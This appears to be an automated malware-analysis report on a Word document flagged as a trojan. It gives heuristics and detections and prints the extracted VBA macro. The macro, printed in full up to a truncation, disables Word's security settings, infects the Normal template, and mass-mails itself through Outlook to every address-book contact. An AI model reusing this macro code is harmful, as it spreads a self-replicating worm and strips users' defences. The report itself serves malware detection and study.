MALICIOUS
328
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros designed to execute automatically upon opening. The Document_Open macro attempts to modify security settings and document properties, likely as a lure to bypass user security or to prepare the system for further malicious activity. The ClamAV detection of 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' strongly suggests a trojan payload.
Heuristics 7
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24936 bytes |
SHA-256: bc8fa991e879976d6da61bf2ac545d38bba04746170732a6520c26df8dba2969 |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
On Error Resume Next
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(45) + Chr(61) + Chr(68) + Chr(97) + Chr(71) + Chr(111) + Chr(78) + Chr(61) + Chr(45)
.Title = Chr(66) + Chr(108) + Chr(65) + Chr(99) + Chr(75) + Chr(32) + Chr(68) + Chr(97) + Chr(89) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
.Subject = Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(105) + Chr(115) + Chr(32) + Chr(97) + Chr(32) + Chr(66) + Chr(108) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(68) + Chr(97) + Chr(121) + Chr(33)
.Comments = Chr(84) + Chr(104) + Chr(120) + Chr(32) + Chr(116) + Chr(111) + Chr(32) + Chr(67) + Chr(111) + Chr(100) + Chr(101) + Chr(98) + Chr(114) + Chr(101) + Chr(97) + Chr(107) + Chr(101) + Chr(114) + Chr(115) + Chr(46)
.Keywords = Chr(32) + Chr(124) + Chr(32) + Chr(66) + Chr(108) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(68) + Chr(97) + Chr(121) + Chr(32) + Chr(124) + Chr(32) + Chr(68) + Chr(97) + Chr(71) + Chr(111) + Chr(78) + Chr(32) + Chr(124) + Chr(32) + Chr(73) + Chr(116) + Chr(65) + Chr(108) + Chr(89) + Chr(32) + Chr(124) + Chr(32)
.Execute
End With
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "" Then
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
CommandBars("tools").Controls("Customize...").Enabled = False
CommandBars("view").Controls("Toolbars").Enabled = False
CommandBars("view").Controls("Status Bar").Enabled = False
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
UN92 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
MM84 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
Application.EnableCancelKey = 0
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set IA14 = ActiveDocument.VBProject.VBComponents.Item(1)
BN71 = True
End If
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
Set IA14 = NormalTemplate.VBProject.VBComponents.Item(1)
MT5 = True
End If
If MT5 = True Then
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\windows\Kernel32.sys"
IA14.CodeModule.AddFromFile ("c:\windows\Kernel32.sys")
IA14.CodeModule.deletelines 1, 4
IA14.CodeModule.replaceline 1, "Sub Document_Close()"
ElseIf BN71 = True Then
IA14.CodeModule.AddFromFile ("c:\windows\Kernel32.sys")
IA14.CodeModule.deletelines 1, 4
End If
whereits = ActiveDocument.FullName
ActiveDocument.SaveAs Environ("WINDIR") & "\free.doc"
DoEvents
ActiveDocument.SaveAs whereits
DoEvents
Set Black_OApp = CreateObject("Outlook.Application")
Set Black_Mapi = Black_OApp.GetNameSpace("MAPI")
For Each Black_AddList In Black_Mapi.AddressLists
If Black_AddList.AddressEntries.Count <> 0 Then
Black_Count = Black_AddList.AddressEntries.Count
For Black_AddListCount = 1 To Black_Count
Set Black_AddListEntry = Black_AddList.AddressEntries(Black_AddListCount)
Set Black_msg = Black_OApp.CreateItem(0)
Black_msg.To = Black_AddListEntry.Address
Black_msg.Subject = "Internet Now FREE, it's the future!!!"
Black_msg.Body = "No more money to surf, NOW it's Free..." +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.